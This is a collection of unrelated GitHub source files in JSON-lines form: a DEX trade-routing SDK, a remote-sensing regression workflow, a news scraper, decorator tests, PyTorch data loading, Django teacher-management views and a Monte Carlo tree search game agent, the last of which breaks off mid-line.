routes. 
Useful when you have simulated the trade\n * elsewhere and do not have any tick data\n * @template Currency The input token, either ICX or an IRC-2\n * @template Currency The output token, either ICX or an IRC-2\n * @template TradeType The type of the trade, either exact in or exact out\n * @param constructorArguments The arguments passed to the trade constructor\n * @returns The unchecked trade\n \"\"\"\n trade = Trade(constructorArguments)\n trade.checkRoute(poolFactoryProvider)\n return trade\n\n def checkRoute (\n self,\n poolFactoryProvider: PoolFactoryProvider\n ):\n \"\"\"\n * Need to be called after the constructor to check for the route uniqueness\n * @param factoryProvider A Factory Provider\n * @param routes The routes through which the trade occurs\n \"\"\"\n numPools = reduce(lambda total, cur:\n total + cur,\n map(lambda swap: len(swap.route.pools), self.swaps),\n 0)\n\n poolAddressSet = set()\n for swap in self.swaps:\n route = swap.route\n for pool in route.pools:\n poolAddressSet.add(Pool.getAddress(poolFactoryProvider, pool.token0, pool.token1, pool.fee))\n\n assert numPools == len(poolAddressSet), 'POOLS_DUPLICATED'\n\n def minimumAmountOut (self, slippageTolerance: Percent, amountOut: CurrencyAmount = None) -> CurrencyAmount:\n \"\"\"\n * Get the minimum amount that must be received from this trade for the given slippage tolerance\n * @param slippageTolerance The tolerance of unfavorable slippage from the execution price of this trade\n * @returns The amount out\n \"\"\"\n if not amountOut:\n amountOut = self.outputAmount\n\n assert not slippageTolerance.lessThan(0), 'SLIPPAGE_TOLERANCE'\n\n if (self.tradeType == TradeType.EXACT_OUTPUT):\n return amountOut\n else:\n slippageAdjustedAmountOut = Fraction(1).add(slippageTolerance).invert().multiply(amountOut.quotient).quotient\n return CurrencyAmount.fromRawAmount(amountOut.currency, slippageAdjustedAmountOut)\n\n def maximumAmountIn (self, slippageTolerance: Percent, amountIn: CurrencyAmount = None) -> CurrencyAmount:\n \"\"\"\n * Get the maximum amount in that can be spent via this trade for the given slippage tolerance\n * @param slippageTolerance The tolerance of unfavorable slippage from the execution price of this trade\n * @returns The amount in\n \"\"\"\n if amountIn is None:\n amountIn = self.inputAmount\n\n assert not slippageTolerance.lessThan(0), 'SLIPPAGE_TOLERANCE'\n\n if (self.tradeType == TradeType.EXACT_INPUT):\n return amountIn\n else:\n slippageAdjustedAmountIn = Fraction(1).add(slippageTolerance).multiply(amountIn.quotient).quotient\n return CurrencyAmount.fromRawAmount(amountIn.currency, slippageAdjustedAmountIn)\n\n def worstExecutionPrice(self, slippageTolerance: Percent) -> Price:\n \"\"\"\n * Return the execution price after accounting for slippage tolerance\n * @param slippageTolerance the allowed tolerated slippage\n * @returns The execution price\n \"\"\"\n return Price (\n self.inputAmount.currency,\n self.outputAmount.currency,\n self.maximumAmountIn(slippageTolerance).quotient,\n self.minimumAmountOut(slippageTolerance).quotient\n )\n\n @staticmethod\n def bestTradeExactIn (\n poolFactoryProvider: PoolFactoryProvider,\n pools: List[Pool],\n currencyAmountIn: CurrencyAmount,\n currencyOut: Currency,\n options: BestTradeOptions = BestTradeOptions(3, 3),\n # used in recursion.\n currentPools: List[Pool] = None,\n nextAmountIn: CurrencyAmount = None,\n bestTrades: List['Trade'] = None\n ) -> List['Trade']:\n \"\"\"\n * Given a list of pools, and a fixed amount in, returns the top `maxNumResults` 
trades that go from an input token\n * amount to an output token, making at most `maxHops` hops.\n * Note this does not consider aggregation, as routes are linear. It's possible a better route exists by splitting\n * the amount in among multiple routes.\n * @param pools the pools to consider in finding the best trade\n * @param nextAmountIn exact amount of input currency to spend\n * @param currencyOut the desired currency out\n * @param maxNumResults maximum number of results to return\n * @param maxHops maximum number of hops a returned trade can make, e.g. 1 hop goes through a single pool\n * @param currentPools used in recursion; the current list of pools\n * @param currencyAmountIn used in recursion; the original value of the currencyAmountIn parameter\n * @param bestTrades used in recursion; the current list of best trades\n * @returns The exact in trade\n \"\"\"\n if nextAmountIn is None:\n nextAmountIn = currencyAmountIn\n if currentPools is None:\n currentPools = []\n if bestTrades is None:\n bestTrades = []\n\n maxNumResults = options.maxNumResults\n maxHops = options.maxHops\n\n assert len(pools) > 0, 'POOLS'\n assert maxHops > 0, 'MAX_HOPS'\n assert currencyAmountIn == nextAmountIn or len(currentPools) > 0, 'INVALID_RECURSION'\n\n amountIn = nextAmountIn.wrapped\n tokenOut = currencyOut.wrapped\n for i in range(len(pools)):\n pool = pools[i]\n # pool irrelevant\n if (not pool.token0.equals(amountIn.currency) and not pool.token1.equals(amountIn.currency)):\n continue\n\n amountOut: CurrencyAmount\n try:\n amountOut, _ = pool.getOutputAmount(amountIn)\n except InsufficientInputAmountError as error:\n # input too low\n if (error.isInsufficientInputAmountError):\n continue\n raise error\n\n # we have arrived at the output token, so this is the final trade of one of the paths\n if (amountOut.currency.isToken and amountOut.currency.equals(tokenOut)):\n sortedInsert (\n bestTrades,\n Trade.fromRoute(\n poolFactoryProvider,\n Route(currentPools + [pool], currencyAmountIn.currency, currencyOut),\n currencyAmountIn,\n TradeType.EXACT_INPUT\n ),\n maxNumResults,\n tradeComparator\n )\n elif (maxHops > 1 and len(pools) > 1):\n poolsExcludingThisPool = pools[0:i] + pools[i + 1: len(pools)]\n\n # otherwise, consider all the other paths that lead from this token as long as we have not exceeded maxHops\n Trade.bestTradeExactIn (\n poolFactoryProvider,\n poolsExcludingThisPool,\n currencyAmountIn,\n currencyOut,\n BestTradeOptions (\n maxNumResults,\n maxHops - 1\n ),\n currentPools + [pool],\n amountOut,\n bestTrades\n )\n\n return bestTrades\n\n @staticmethod\n def bestTradeExactOut (\n poolFactoryProvider: PoolFactoryProvider,\n pools: List[Pool],\n currencyIn: Currency,\n currencyAmountOut: CurrencyAmount,\n options: BestTradeOptions = BestTradeOptions(3, 3),\n # used in recursion.\n currentPools: List[Pool] = None,\n nextAmountOut: CurrencyAmount = None,\n bestTrades: List['Trade'] = None\n ) -> List['Trade']:\n \"\"\"\n * similar to the above method but instead targets a fixed output amount\n * given a list of pools, and a fixed amount out, returns the top `maxNumResults` trades that go from an input token\n * to an output token amount, making at most `maxHops` hops\n * note this does not consider aggregation, as routes are linear. 
it's possible a better route exists by splitting\n * the amount in among multiple routes.\n * @param pools the pools to consider in finding the best trade\n * @param currencyIn the currency to spend\n * @param currencyAmountOut the desired currency amount out\n * @param nextAmountOut the exact amount of currency out\n * @param maxNumResults maximum number of results to return\n * @param maxHops maximum number of hops a returned trade can make, e.g. 1 hop goes through a single pool\n * @param currentPools used in recursion; the current list of pools\n * @param bestTrades used in recursion; the current list of best trades\n * @returns The exact out trade\n \"\"\"\n if nextAmountOut is None:\n nextAmountOut = currencyAmountOut\n\n if bestTrades is None:\n bestTrades = []\n\n if currentPools is None:\n currentPools = []\n\n maxNumResults = options.maxNumResults\n maxHops = options.maxHops\n\n assert len(pools) > 0, 'POOLS'\n assert maxHops > 0, 'MAX_HOPS'\n assert currencyAmountOut == nextAmountOut or len(currentPools) > 0, 'INVALID_RECURSION'\n\n amountOut = nextAmountOut.wrapped\n tokenIn = currencyIn.wrapped\n for i in range(len(pools)):\n pool = pools[i]\n # pool irrelevant\n if (not pool.token0.equals(amountOut.currency) and not pool.token1.equals(amountOut.currency)):\n continue\n\n amountIn: CurrencyAmount\n try:\n amountIn, _ = pool.getInputAmount(amountOut)\n except InsufficientInputAmountError as error:\n # input too low\n if (error.isInsufficientInputAmountError):\n continue\n raise error\n \n # we have arrived at the input token, so this is the first trade of one of the paths\n if (amountIn.currency.equals(tokenIn)):\n sortedInsert(\n bestTrades,\n Trade.fromRoute(\n poolFactoryProvider,\n Route([pool] + currentPools, currencyIn, currencyAmountOut.currency),\n currencyAmountOut,\n TradeType.EXACT_OUTPUT\n ),\n maxNumResults,\n tradeComparator\n )\n elif (maxHops > 1 and len(pools) > 1):\n poolsExcludingThisPool = pools[0:i] + pools[i+1:]\n\n # otherwise, consider all the other paths that arrive at this token as long as we have not exceeded maxHops\n Trade.bestTradeExactOut(\n poolFactoryProvider,\n poolsExcludingThisPool,\n currencyIn,\n currencyAmountOut,\n BestTradeOptions (\n maxNumResults,\n maxHops - 1\n ),\n [pool] + currentPools,\n amountIn,\n bestTrades\n )\n\n return bestTrades\n","repo_name":"Convexus-Protocol/convexus-sdk-py","sub_path":"convexus/sdk/entities/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":24804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
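The slippage adjustment in `minimumAmountOut` above is plain fraction arithmetic; a sketch using only the `Fraction`/`Percent` types the record itself imports, chained exactly as that method chains them (the token amount and tolerance are made-up values):

from convexus.sdkcore.entities.fractions.fraction import Fraction
from convexus.sdkcore.entities.fractions.percent import Percent

amount_out = 10_000                      # hypothetical raw output amount
tolerance = Percent(50, 10_000)          # 0.50% slippage tolerance
# minimum out = amount_out / (1 + tolerance), as in minimumAmountOut
minimum = Fraction(1).add(tolerance).invert().multiply(amount_out).quotient
print(minimum)                           # 9950 for a 0.5% tolerance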
+{"seq_id":"41982440598","text":"\"\"\"\n author: rkopeinig\n script: Workflow\n description: Workflow of retrieving time series from GeoJSON, aggregate, smooth and perform linear regression\n date: 07/27/2018\n version: 1.0\n\"\"\"\n\n# Import dependencies\nimport fire, datetime, requests, json\nimport pandas as pd\nimport geopandas as gpd\nfrom dataclient.tsservice import get_curve, TSService\nfrom dateutil import parser\nfrom pytsa.preprocessing import savitz_golay\nfrom sklearn import linear_model\n\n\n# How to:\n'''\npython workflow.py --coverageId 'PROBAV_L3_S10_TOC_NDVI_333M' --start_date '2013-10-11T00:00Z' --end_date '2018-07-01T00:00Z' --geometry '../../../../data/ASB/geojson/ca.geojson' --aggregate 'M' --aggregate_function 'mean' --window 10 --polyorder 2 --output_folder '../../../../data/ASB/output/'\n'''\n\nclass TimeSeries(object):\n def __init__(self, coverageId, start_date, end_date, geometry, aggregate, aggregate_function, window, polyorder, output_folder):\n self.coverageId = coverageId\n self.start_date = start_date\n self.end_date = end_date\n self.geometry = geometry\n self.aggregate = aggregate\n self.aggregate_function = aggregate_function\n self.output = output_folder\n self.time_series = self.get_time_series_from_geojson(self.coverageId,\n self.geometry,\n self.start_date,\n self.end_date)\n\n self.time_series = self.time_series.resample(self.aggregate, how=self.aggregate_function)\n self.time_series = savitz_golay(self.time_series,window=window,polyorder=polyorder)\n\n self.lm = linear_model.LinearRegression()\n self.X = pd.DataFrame({'1': self.time_series[1],\n '2': self.time_series[2],\n '3': self.time_series[3]}, index=self.time_series.index)\n self.y = pd.DataFrame(self.time_series[0], index=self.time_series.index)\n\n model = self.lm.fit(self.X, self.y)\n predictions = self.lm.predict(self.X)\n self.result = pd.DataFrame(predictions, index=self.X.index)\n\n self.save()\n\n\n def get_time_series_from_geojson(self, coverage_id, geojson_path, start_date, end_date):\n with open(geojson_path) as f:\n data = json.load(f)\n\n geojson_dataframe = gpd.read_file(geojson_path)\n start_date = parser.parse(start_date)\n end_date = parser.parse(end_date)\n iterable = TSService().timeseries_async(coverage_id, geojson_dataframe, start_date, end_date)\n ts = []\n for i in iterable:\n ts.append(i)\n return pd.DataFrame(ts).T\n\n\n def save(self):\n self.time_series.to_csv(self.output+'time_series.csv')\n self.result.to_csv(self.output+'lin_reg_result.csv')\n\nif __name__ == '__main__':\n fire.Fire(TimeSeries)\n\n","repo_name":"LIST-LUXEMBOURG/ASB_integration","sub_path":"Python/workflow/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18771318216","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n# phòng nhiều web sẽ bắt xác nhận có phải robot hay không\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nf = open('D:\\coder\\DATA_ENGINEER\\PYTHON\\PYTHON\\THUC_HANH\\craw_data_article\\list_data_article.csv',\n 'w', encoding='utf-8')\n\nr = requests.get(\"https://dantri.com.vn\", headers=headers)\nhead = \"link_img , title \\n\"\nf.write(head)\n# # lấy data trên web về\n# # - text : lấy mỗi chữ\n# # - content : lấy cả hình ảnh ,...\n# # - json() : lấy kiểu dạng json\n\n\nif r.status_code == 200:\n # kiểm tra trạng thái : json or status_code => 200 -> success , 400 -> false\n soup = BeautifulSoup(r.text, 'html.parser')\n data = soup.find_all(\"article\")\n i = 1\n for row in data:\n\n print(\"counter : \", i)\n # --------- img\n link_img = \"https://dantri.com.vn\" + \\\n row.find('a').get('href').strip()\n\n # ----- title\n # method BeautifulSoup : text = get_text()\n title = row.find('h3').get_text().strip().replace(\"\\n\", ' ')\n\n # result\n file_csv = f'{link_img}, {title} , \\n'\n f.write(file_csv)\n i += 1\nelse:\n print(\"Không tìm thấy đường link \")\n\nf.close\n","repo_name":"Duancoderdao/project_py","sub_path":"crawl_data_test/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22179020976","text":"import uuid\n\nimport pytest\n\nfrom uber.decorators import id_required\nfrom uber.errors import HTTPRedirect\nfrom uber.models import Attendee, Group, Session\n\n\nclass TestIdRequired:\n\n @pytest.mark.parametrize('ModelClass', [Attendee, Group])\n @pytest.mark.parametrize('params', [\n {},\n {'not_an_id': 'not an id'},\n {'id': None},\n {'id': []},\n {'id': {}},\n {'id': ''},\n {'id': 'Invalid UUID'},\n {'id': 'd17fbcba-d5cc-44de-8cb1-83091211a829'} # Non-existent id\n ])\n def test_model_id_invalid(self, ModelClass, params):\n\n @id_required(ModelClass)\n def _requires_model_id(**params):\n return True\n\n params['session'] = Session().session\n pytest.raises(HTTPRedirect, _requires_model_id, **params)\n\n @pytest.mark.parametrize('ModelClass', [Attendee, Group])\n def test_model_id_valid(self, ModelClass):\n\n @id_required(ModelClass)\n def _requires_model_id(**params):\n return True\n\n with Session() as session:\n model = ModelClass()\n session.add(model)\n session.flush()\n model_id = uuid.UUID(model.id)\n assert _requires_model_id(**{\n 'session': session,\n 'id': 'None'}) # We explicitly allow the string 'None'\n assert _requires_model_id(**{\n 'session': session,\n 'id': model_id}) # 'id' as a uuid.UUID() instance\n assert _requires_model_id(**{\n 'session': session,\n 'id': model_id.hex}) # 'id' as a str instance\n","repo_name":"magfest/ubersystem","sub_path":"tests/uber/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
+{"seq_id":"33867431518","text":"import warnings\nfrom typing import Optional, Tuple\n\nwarnings.filterwarnings(\"ignore\")\n\nimport structlog\nfrom mlflow.tracking import MlflowClient\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import ImageFolder\n\nLOGGER = structlog.get_logger()\n\nfrom torchvision import transforms\n\n\ndef download_image_archive(\n run_id: str, archive_path: str, destination_path: Optional[str] = None\n) -> str:\n client: MlflowClient = MlflowClient()\n image_archive_path: str = client.download_artifacts(\n run_id=run_id, path=archive_path, dst_path=destination_path\n )\n LOGGER.info(\n \"Image archive downloaded\",\n run_id=run_id,\n storage_path=archive_path,\n dst_path=image_archive_path,\n )\n return image_archive_path\n\n\ndef create_image_dataset(\n data_dir: str,\n rescale: float = 1.0 / 255,\n validation_split: float = 0.2,\n batch_size: int = 32,\n seed: int = 8237131,\n label_mode: str = \"categorical\",\n color_mode: str = \"grayscale\",\n image_size: Tuple[int, int] = (28, 28),\n):\n if color_mode == \"grayscale\":\n transform = transforms.Compose(\n [\n # you can add other transformations in this list\n transforms.ToTensor(),\n transforms.Grayscale(),\n ]\n )\n else:\n transform = transforms.Compose(\n [\n # you can add other transformations in this list\n transforms.ToTensor()\n ]\n )\n\n dataset = ImageFolder(root=data_dir, transform=transform)\n data_generator = DataLoader(dataset, batch_size=batch_size, shuffle=True)\n return data_generator\n","repo_name":"hhuangMITRE/dioptra","sub_path":"examples/pytorch-mnist-membership-inference/src/data_pytorch.py","file_name":"data_pytorch.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"33474008341","text":"#!/usr/bin/python3\nimport execjs\nf = open('./sign.js', 'r', encoding='utf-8')\nline = f.readline()\nhtmlstr = ''\nwhile line:\n htmlstr = htmlstr + line\n line = f.readline()\nctx = execjs.compile(htmlstr)\n\n# 调用js方法\ndef run_js(params):\n return ctx.call('createSign', params)\n","repo_name":"Pr0mi5e/python2smb","sub_path":"script/runjs.py","file_name":"runjs.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4923733602","text":"import numpy as np\nimport cv2\nimport os\nimport random\n\n\n\nscript_crop_path = 'champs/' #Path that contains all headshots of the champs\nsave_path = 'training_set/' #Path that the training sets and testing sets will be saved\ntest_ratio = 0.05 #Ratio of test images\n\nchampions_found = []\n\ntrain_images = []\ntrain_labels = []\n\ntest_images = []\ntest_labels = []\n\ndef create_class_txt():\n global champions_class\n \"\"\"\n create a .txt file that records the index of class\n \"\"\"\n file = open(save_path+'class.txt', 'w')\n for champion_name in os.listdir(script_crop_path):\n if champion_name in champions_class:\n file.write(str(champions_class.index(champion_name)) + \n ':' + \n str(champion_name)\n + '\\n')\n return True\n\ndef create_train_data():\n \"\"\"\n Creates the .npy file of the training and testing sets\n \"\"\"\n global toDisplay\n r_max = int(1/test_ratio)\n n = 1\n for champion_name in os.listdir(script_crop_path):\n if champion_name in champions_class:\n champions_found[champions_class.index(champion_name)] = 1\n for image in os.listdir(script_crop_path+champion_name+'/'):\n img = cv2.imread(script_crop_path+champion_name+'/'+image)\n img = cv2.resize(img,(24,24))\n r = random.randint(1,r_max)\n if r == 1:\n test_images.append(img)\n test_labels.append(champions_class.index(champion_name))\n else:\n train_images.append(img)\n train_labels.append(champions_class.index(champion_name))\n n = n + 1\n\ndef launchScanner():\n global train_images,train_labels,test_images,test_labels,champions_class,toDisplay,KEEP_DISPLAYING\n global champions_found\n \n KEEP_DISPLAYING = True\n train_images = []\n train_labels = []\n\n test_images = []\n test_labels = []\n \n #Open the file and read the selected champions from it\n file = open(\"selectedChampions.txt\", \"r\")\n selectedChampionsString = file.readline()\n champions_class = selectedChampionsString.split(',')\n champions_found = [0 for n in range(len(champions_class))]\n \n create_class_txt()\n create_train_data()\n\n train_images = np.array(train_images)\n train_labels = np.array(train_labels)\n test_images = np.array(test_images)\n test_labels = np.array(test_labels)\n\n np.save(save_path +\"train_images\", train_images)\n np.save(save_path +\"train_labels\", train_labels)\n np.save(save_path +\"test_images\", test_images)\n np.save(save_path +\"test_labels\", test_labels)\n print(\"--------------------------------------------\")\n print(\"Train images size: \" + str(train_images.shape))\n print(\"Train labels size: \" + str(train_labels.shape))\n print(\"Test images size : \" + str(test_images.shape))\n print(\"Test labels size : \" + str(test_labels.shape))\n champions_found_string = ''\n for n in range(len(champions_class)):\n if champions_found[n] == 0:\n champions_found_string = champions_found_string + str(champions_class[n]) + \": not found, \"\n else:\n champions_found_string = champions_found_string + str(champions_class[n]) + \": found, \" \n print(champions_found_string)\n return champions_found\n\n\n\n\n\n\n","repo_name":"dcheng728/League-X","sub_path":"launch_scanner.py","file_name":"launch_scanner.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"}
+{"seq_id":"73564010322","text":"#coding=utf-8\n#date:14-11-4\n__author__ = 'monica'\n\nfrom rest_framework.views import APIView\nfrom kindergarten.models import User,TeacherInfo\nfrom django.http import HttpResponse\nfrom kindergarten.script.util import Util\nfrom model_serializer import TeacherListSerializer\nfrom kindergarten.script.func import Func\nimport time\nfunc=Func()\n\n'''获取列表'''\nclass GetTeacherList(APIView):\n def get(self, request, **kwargs):\n #分页\n pagesize, pageindex = Util.getPageSizeAndIndex(request)\n args={}\n #查询条件\n if 'name' in request.GET and request.GET['name']:\n args['name__contains'] = request.GET['name'].strip()\n datalist , counts = func.GetTeacherPageList(pagesize, pageindex,**args)\n data=TeacherListSerializer(datalist).data\n return Util.GetResponseData(True,0,data,counts)\n\n'''添加/修改'''\nclass AddTeacher(APIView):\n def post(self, request, **kwargs):\n if 'name' in request.POST and request.POST['name']:\n name = request.POST['name'].strip()\n #如果有id,则修改\n if 'id' in request.POST and request.POST['id']:\n teacherid=request.POST['id']\n try:\n teacher=TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n teacher.name = name\n teacher.modifytime = time.time()\n else:\n #新建\n teacher=TeacherInfo.objects.create(name=name)\n if 'sex' in request.POST and request.POST['sex']:\n teacher.sex = request.POST['sex'].strip()\n if 'birthday' in request.POST and request.POST['birthday']:\n teacher.birthday = request.POST['birthday'].strip()\n if 'phone' in request.POST:\n teacher.phone = request.POST['phone'].strip()\n if 'city' in request.POST:\n teacher.city = request.POST['city'].strip()\n if 'address' in request.POST:\n teacher.address = request.POST['address'].strip()\n if 'joindate' in request.POST and request.POST['joindate']:\n teacher.joindate = request.POST['joindate'].strip()\n if 'educate_school' in request.POST:\n teacher.educate_school = request.POST['educate_school'].strip()\n if 'degree' in request.POST and request.POST['degree']:\n teacher.degree = request.POST['degree'].strip()\n if 'teaching' in request.POST:\n teacher.teaching = request.POST['teaching'].strip()\n if 'photo' in request.POST and request.POST['photo']:\n teacher.photo = request.POST['photo'].strip()\n teacher.save()\n return Util.GetResponseData(True,0,teacher.id)\n else:\n return Util.GetResponseData(False,-3)\n\n'''设置教师头像'''\nclass SetTeacherPhoto(APIView):\n def post(self, request, **kwargs):\n if 'teacherid' in kwargs and kwargs['teacherid']:\n teacherid = kwargs['teacherid']\n try:\n teacher = TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n istop=True\n if 'photo' in kwargs and kwargs['istop']:\n teacher.photo = kwargs['photo'].strip()\n teacher.save()\n return Util.GetResponseData(True)\n return Util.GetResponseData(False,-3)\n\n'''删除'''\nclass DeleteTeacher(APIView):\n def post(self, request, **kwargs):\n if 'teacherid' in kwargs and kwargs['teacherid']:\n teacherid=kwargs['teacherid']\n try:\n teacher=TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n teacher.delete()\n return Util.GetResponseData(True)\n else:\n return 
Util.GetResponseData(False,-3)\n","repo_name":"dengqiuhua/kindergarten","sub_path":"kindergarten/api/api_teacher.py","file_name":"api_teacher.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"74498118800","text":"from game import play\nfrom game.actions import MoveOnePiece\nfrom agents import Agent\nfrom training import constants as model_const, decode, model\nimport encoders.game_state as gs_enc\nimport game.state_change as sc\n\nimport attr\nimport numpy as np\nimport logging\nimport time\n\nfrom collections import defaultdict\nfrom enum import Enum\n\nlogger = logging.getLogger('mcts_zero_debug_logger')\nlogger.setLevel(logging.ERROR)\n\n\n@attr.s(slots=True)\nclass ExperienceCollector:\n indices_by_faction_name = attr.ib()\n game_states = attr.ib(factory=list)\n move_visits = attr.ib(factory=list)\n winner = attr.ib(default=None)\n\n def record_move(self, game_state, move_visits):\n self.game_states.append(game_state)\n self.move_visits.append(move_visits)\n\n def complete_episode(self, winner):\n self.winner = winner\n\n @staticmethod\n def _assign_move_probs_aux(values_and_move_probs, row, output_head, decoder, move_visits):\n for move in move_visits.keys():\n move_prob = move_visits[move] / sum(move_visits.values())\n head = values_and_move_probs[output_head]\n head[row, decoder(move)] = move_prob\n\n @staticmethod\n def _assign_move_probs(values_and_move_probs, row, top_action_class, move_visits):\n output_head = decode.model_head_by_action_class[top_action_class].value\n decoder = decode.decoders[top_action_class]\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, output_head, decoder, move_visits)\n\n @staticmethod\n def _assign_move_probs__move_one_piece(values_and_move_probs, row, move_visits):\n board_coord_visits = defaultdict(int)\n piece_type_visits = defaultdict(int)\n for move, visits in move_visits.items():\n board_coords, piece_type = move\n board_coord_visits[board_coords] += visits\n piece_type_visits[piece_type] += visits\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, model_const.Head.BOARD_COORDS_HEAD.value,\n decode.decode_board_space, board_coord_visits)\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, model_const.Head.PIECE_TYP_HEAD.value,\n decode.decode_enum_value, piece_type_visits)\n\n def to_numpy(self):\n encoded_game_states = [gs_enc.encode(game_state) for game_state in self.game_states]\n encoded_boards = np.array([egs.board for egs in encoded_game_states])\n encoded_data = np.array([egs.encoded_data() for egs in encoded_game_states])\n values_and_move_probs = model.empty_heads(len(self.game_states))\n values_and_move_probs[model_const.Head.VALUE_HEAD.value][:, self.indices_by_faction_name[self.winner]] = 1\n for i, game_state in enumerate(self.game_states):\n top_action_class = game_state.action_stack.first.__class__\n if top_action_class is MoveOnePiece:\n # If the action is [MoveOnePiece], we can't just use a decoder as normal. 
We need to compute probabilities\n # for both board space and piece type from the available choices.\n ExperienceCollector._assign_move_probs__move_one_piece(values_and_move_probs, i, self.move_visits[i])\n else:\n ExperienceCollector._assign_move_probs(values_and_move_probs, i, top_action_class, self.move_visits[i])\n\n return encoded_boards, encoded_data, values_and_move_probs\n\n\n@attr.s(slots=True)\nclass Branch:\n # Prior probability of choosing this branch, based on the model's prediction\n # for the parent state\n prior = attr.ib()\n visit_count = attr.ib(default=0)\n total_value = attr.ib(default=0.0)\n\n\n@attr.s(slots=True)\nclass Node:\n game_state = attr.ib()\n # Mapping from player faction to value for this state\n values = attr.ib()\n # [parent] and [last_move] are stored to facilitate propagating values back up the tree\n parent = attr.ib()\n last_move = attr.ib()\n total_visit_count = attr.ib(default=1)\n branches = attr.ib(factory=dict)\n children = attr.ib(factory=dict)\n\n @classmethod\n def from_state(cls, state, values, parent, last_move, priors):\n node = cls(state, values, parent, last_move)\n for move, p in priors.items():\n node.branches[move] = Branch(p)\n if parent is not None:\n parent._add_child(last_move, node)\n return node\n\n def moves(self):\n return list(self.branches.keys())\n\n def _add_child(self, move, child_node):\n self.children[move] = child_node\n\n def has_child(self, move):\n return move in self.children\n\n def expected_value(self, move):\n branch = self.branches[move]\n if branch.visit_count == 0:\n return 0.0\n return branch.total_value / branch.visit_count\n\n def prior(self, move):\n return self.branches[move].prior\n\n def visit_count(self, move):\n return self.branches[move].visit_count\n\n def record_visit(self, move, value):\n self.total_visit_count += 1\n self.branches[move].visit_count += 1\n self.branches[move].total_value += value\n\n def propagate_values(self):\n node = self\n values = node.values\n while node.parent is not None:\n last_move = node.last_move\n value_for_current_node = values[sc.get_current_player(node.parent.game_state).faction_name()]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Recording a visit for {node.parent.game_state.action_stack.first.__class__}')\n node.parent.record_visit(last_move, value_for_current_node)\n node = node.parent\n\n\n# TODO: IMPORTANT - SHARE THE TREE BETWEEN SIMULATIONS OF THE SAME GAME\n@attr.s(slots=True)\nclass MCTSZeroAgent(Agent):\n simulations_per_choice = attr.ib()\n c = attr.ib()\n view = attr.ib()\n worker_env_conn = attr.ib()\n experience_collectors = attr.ib(factory=dict)\n\n def begin_episode(self, factions):\n for faction in factions:\n self.experience_collectors[faction] = None\n\n def complete_episode(self, winner):\n for experience_collector in self.experience_collectors.values():\n experience_collector.complete_episode(winner)\n\n def select_branch(self, node):\n total_n = node.total_visit_count\n\n def score_branch(move):\n q = node.expected_value(move)\n p = node.prior(move)\n n = node.visit_count(move)\n score = q + self.c * p * np.sqrt(total_n) / (n + 1)\n # if logger.isEnabledFor(logging.DEBUG):\n # logger.debug(f'Evaluating move {move}')\n # logger.debug(f'EV: {q}; P: {p}; VC: {n}; Score: {score}')\n return score\n\n return max(node.moves(), key=score_branch)\n\n # Even though [choices] is implied by [game_state], we pass it in here to avoid recomputing it\n # since we needed to compute it in the initial call to [select_move] in order to shortcut in 
the\n # event that there are 0 or 1 choices.\n async def create_node_async(self, game_state, choices, move=None, parent=None):\n if game_state.is_over():\n values = {}\n for player in game_state.players_by_idx:\n faction_name = player.faction_name()\n values[faction_name] = 1 if faction_name is game_state.winner else 0\n move_priors = {}\n else:\n t = time.time()\n # Encode game state and write to shared memory\n encoded_game_state = gs_enc.encode(game_state)\n assert self.view.board.shape == encoded_game_state.board.shape\n self.view.board[:] = encoded_game_state.board\n encoded_data = encoded_game_state.encoded_data()\n assert self.view.data.shape == encoded_data.shape\n self.view.data[:] = encoded_data\n self.worker_env_conn.wake_up_env()\n await self.worker_env_conn.worker_get_woken_up()\n # Read the predictions out of shared memory and convert them to values and move priors\n values, move_priors = model.to_values_and_move_priors(game_state, choices, self.view.preds)\n # print(f'Took {time.time() - t}s to get evaluation results')\n new_node = Node.from_state(game_state, values, parent, move, move_priors)\n # if parent is not None:\n # parent.add_child(move, new_node)\n return new_node\n\n async def select_move_async(self, game_state):\n faction_name = sc.get_current_player(game_state).faction_name()\n if self.experience_collectors[faction_name] is None:\n indices_by_faction_name = gs_enc.get_indices_by_faction_name(game_state)\n self.experience_collectors[faction_name] = ExperienceCollector(indices_by_faction_name)\n\n choices = game_state.legal_moves()\n if not choices:\n return None\n if len(choices) == 1:\n return choices[0]\n\n old_level = logging.getLogger().level\n logging.getLogger().setLevel(logging.ERROR)\n root = await self.create_node_async(game_state, choices)\n\n for i in range(self.simulations_per_choice * len(choices)):\n logger.debug('STARTING AT THE ROOT')\n node = root\n while node.moves():\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selecting a branch for {node.game_state.action_stack.first.__class__}')\n move = 